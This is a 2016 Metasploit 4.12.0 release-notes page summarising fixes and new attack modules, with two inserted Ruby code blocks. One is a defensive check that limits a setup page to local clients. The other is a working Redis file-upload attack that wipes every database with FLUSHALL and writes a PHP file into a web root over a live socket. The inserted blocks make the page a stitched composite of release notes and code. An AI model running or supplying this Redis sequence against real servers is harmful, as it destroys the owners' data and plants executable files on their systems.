Metasploit 4.12.0 (Update 2016091401)

Document created by tdoan Employee on Sep 14, 2016
Version 1

Bugs Fixed


  • PR #7205 - This patch shifts Nessus bridge plugin support in framework from older, built-in code to the newer, more up-to-date nessus_rest gem.
  • PR #7248 - This fixes a stack trace in post/windows/gather/credentials/enum_cred_store when the CredEnumerateA Railgun call doesn't exist in systems older than Windows XP.
  • PR #7251 - This fixes the CPORT source port option for auxiliary/scanner/smb/smb_login. Previously, the local_port option wasn't being passed to Metasploit::Framework::LoginScanner::SMB. This PR corrects that behavior.
  • PR #7262 - This adds support for the FLUSHALL Redis command (http://redis.io/commands/FLUSHALL) to auxiliary/scanner/redis/file_upload. FLUSHALL deletes every key in every Redis database before the file is written, so the resulting dump contains little besides the uploaded content, which makes it more likely that the uploaded file is usable. Note that this destroys all data held by the target Redis instance.
  • PR #7274 - The following deprecated modules were removed: auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301, auxiliary/gather/apache_karaf_command_execution, auxiliary/gather/dns_bruteforce, auxiliary/gather/dns_cache_scraper, auxiliary/gather/dns_info, auxiliary/gather/dns_reverse_lookup, auxiliary/gather/dns_srv_enum, auxiliary/scanner/netbios/nbname_probe, exploits/linux/http/struts_dmi_exec, and post/windows/manage/smart_migrate. The following module was undeprecated: exploits/windows/smb/psexec_psh.
  • PR #7290 - This fixes post/windows/gather/credentials/winscp to check for missing environment variables on module run. Previously, missing environment variables would cause the module to crash.
  • PR #7307 - This fixes a bug introduced by the ntlm gemification in some of the SMB utilities (specifically the smb_version scanner and smb_enumshares): some of the returned data was accidentally not populated correctly.
  • Pro: MS-303 - Attempting to run a task chain that was already running caused it to fail. This fix disables the 'Run' buttons while a task chain run is in progress.
  • Pro: MS-1981 - An issue caused the import of vulnerability data from two different Nexpose consoles to fail. This fixes the issue so that vulnerability data can be imported from multiple Nexpose consoles.
  • Pro: MS-1955 - Events in the task log now start with the timestamp so that they can be easily sorted.
  • Pro: MS-2007 - An issue caused Bruteforce to fail when it attempted to run the WordpressMulticall login scanner. This fix changes it to conform to the normal scanner API so that it can run without any issues.
  • Pro: MS-2031 - CVE links for vulnerabilities were not pointing to the correct URL. This fix ensures that the CVEs all reference the same site.
  • Pro: MS-2038 - In the previous release of Metasploit 4.12.0, access restriction to the initial setup page after installation did not work properly. This created a potential vulnerability: a remote attacker who reached the setup page first could create the initial administrative user account. This fix resolves the security issue and restricts the page to local users.
  • Pro: MS-2043 - An issue caused Metasploit Pro to not start if a previous MetaModule run did not complete. This fix ensures that Metasploit Pro starts as expected when a MetaModule run does not complete.
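The PR #7262 entry above describes why FLUSHALL helps a Redis file upload. The following is an added example, not Metasploit's own module code: it builds the RESP command sequence that such an upload sends and parses the one-line replies. It assumes the standard technique of pointing the RDB dump at the target path with CONFIG SET dir / CONFIG SET dbfilename, storing the payload in a key, and forcing a dump with SAVE; the key name `payload` and the `run` helper are this example's own choices.

```ruby
# Added example (not Metasploit's own code): the RESP command sequence behind a
# Redis "file upload". Redis writes its RDB dump wherever CONFIG SET dir/dbfilename
# point it, so SET + SAVE drops a file containing the payload; FLUSHALL first
# empties every database so the dump holds little besides our key.
# The CONFIG SET / SAVE steps are assumed to be what the module does.
require 'socket'

module RedisUpload
  # Encode one command as a RESP array of bulk strings (what redis-cli sends).
  def self.encode(*args)
    parts = args.map(&:to_s)
    out = "*#{parts.size}\r\n"
    parts.each { |p| out << "$#{p.bytesize}\r\n#{p}\r\n" }
    out
  end

  # Wire-format commands that write +payload+ to +dir+/+filename+ on the server.
  # flush: true sends FLUSHALL first; this is destructive to all existing data.
  def self.upload_sequence(dir:, filename:, payload:, key: 'payload', flush: true)
    cmds = []
    cmds << ['FLUSHALL'] if flush
    cmds << ['CONFIG', 'SET', 'dir', dir]
    cmds << ['CONFIG', 'SET', 'dbfilename', filename]
    cmds << ['SET', key, payload]
    cmds << ['SAVE']
    cmds.map { |c| encode(*c) }
  end

  # Parse the one-line replies these commands produce: +OK, -ERR ..., :n.
  # A -ERR on CONFIG usually means the command was renamed or disabled, so
  # the upload cannot work and should stop there.
  def self.parse_reply(line)
    case line[0]
    when '+' then [:ok, line[1..-1].chomp]
    when '-' then [:error, line[1..-1].chomp]
    when ':' then [:int, line[1..-1].to_i]
    else [:unknown, line.chomp]
    end
  end

  # Send the sequence to a live server, stopping at the first error reply.
  # Not exercised offline; shown so the exchange is complete.
  def self.run(host, port, **opts)
    sock = TCPSocket.new(host, port)
    replies = []
    upload_sequence(**opts).each do |cmd|
      sock.write(cmd)
      reply = parse_reply(sock.gets("\r\n"))
      replies << reply
      break if reply[0] == :error
    end
    replies
  ensure
    sock&.close
  end
end

if $PROGRAM_NAME == __FILE__
  # Constructed sample: what goes on the wire for a web-root drop.
  RedisUpload.upload_sequence(dir: '/var/www/html', filename: 'x.php',
                              payload: '<?php ?>').each { |c| print c }
end
```

Without `flush: true` the dump still contains every other key in the instance, which is binary noise around the payload; with it, the RDB header and footer are the only other bytes. Either way, a `-ERR` reply to CONFIG SET means the operator has renamed or disabled the command and the technique will not work.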
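The MS-2038 entry above says the setup page is now restricted to local users. As an added illustration, not Metasploit Pro's actual patch, here is a Rack-style middleware that makes that decision on the socket peer address only. The setup path `/setup` and the class name are assumptions for the example.

```ruby
# Added example (not Metasploit Pro's code): restrict a first-run setup page to
# loopback clients. The decision is made on REMOTE_ADDR, the address of the TCP
# peer, and never on X-Forwarded-For, which any client can set.
require 'ipaddr'

class LocalOnlySetup
  LOOPBACK = [IPAddr.new('127.0.0.0/8'), IPAddr.new('::1')].freeze

  # app: the downstream Rack app; setup_path: assumed path of the setup page.
  def initialize(app, setup_path: '/setup')
    @app = app
    @setup_path = setup_path
  end

  def call(env)
    path = env['PATH_INFO'].to_s
    protected_path = path == @setup_path || path.start_with?(@setup_path + '/')
    if protected_path && !self.class.local?(env['REMOTE_ADDR'])
      return [403, { 'Content-Type' => 'text/plain' },
              ["Setup is only available from the local machine\n"]]
    end
    @app.call(env)
  end

  # True only for 127.0.0.0/8, ::1, or an IPv4-mapped IPv6 form of 127/8.
  # Unparseable or missing addresses fail closed.
  def self.local?(remote_addr)
    return false if remote_addr.nil? || remote_addr.empty?
    ip = IPAddr.new(remote_addr).native # ::ffff:127.0.0.1 -> 127.0.0.1
    LOOPBACK.any? { |net| net.include?(ip) }
  rescue IPAddr::InvalidAddressError
    false
  end
end

if $PROGRAM_NAME == __FILE__
  app = LocalOnlySetup.new(->(_env) { [200, {}, ['ok']] })
  # Constructed request: remote client spoofing X-Forwarded-For.
  status, = app.call('PATH_INFO' => '/setup', 'REMOTE_ADDR' => '203.0.113.9',
                     'HTTP_X_FORWARDED_FOR' => '127.0.0.1')
  puts "remote client with spoofed XFF -> #{status}"
end
```

This check is only meaningful when the application terminates the TCP connection itself. Behind a reverse proxy, REMOTE_ADDR is the proxy's address, so every request would look local; in that deployment the restriction has to be enforced at the proxy (or by binding the setup listener to loopback) rather than in the application.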


Features and Enhancements


  • PR #6616 - This adds a module for password guessing against OWA's Exchange Web Services (EWS) endpoint, which often exposes NTLM authentication over HTTPS. It is typically faster than guessing against the traditional form-based OWA login.
  • PR #7228 - Zabbix is an open-source network and application monitoring system. This adds a module that exploits a remote SQL injection vulnerability in Zabbix 3.0.3, and possibly earlier versions, to retrieve the user names and password hashes from its user database.
  • PR #7278 - FTP path traversal modules such as auxiliary/scanner/ftp/pcman_ftp_traversal showed an error when run because the FTP data connection was not open. The path traversal scanner modules now run without error.
  • PR #7287 - This adds a post-exploitation module that retrieves the user names and cracks the passwords of MDaemon Email Server.
  • PR #7288 - This adds a login scanner module for Octopus Deploy Server, a tool for automated releases of ASP.NET applications into test, staging and production environments.
  • PR #7299 - The WordPress login scanner now behaves internally like the other login scanners, which allows it to integrate properly into other projects such as Metasploit Pro.
  • PR #7306 - This updates the references for these modules: auxiliary/admin/http/webnms_cred_disclosure, auxiliary/admin/http/webnms_file_download, and exploits/multi/http/webnms_file_upload.


Exploits Added


  • SugarCRM REST Unserialize PHP Code Execution by EgiX - This module exploits a PHP object injection vulnerability in SugarCRM. It allows an unauthenticated user to execute arbitrary PHP code in the context of www-data (web server privileges).


Offline Update


To download the offline file for this update, go to http://updates.metasploit.com/packages/460768af7651e226c249e52bd1b776251df07a42.bin.


Version Information


PRO 4.12.0 updates to 4.12.0-2016091401
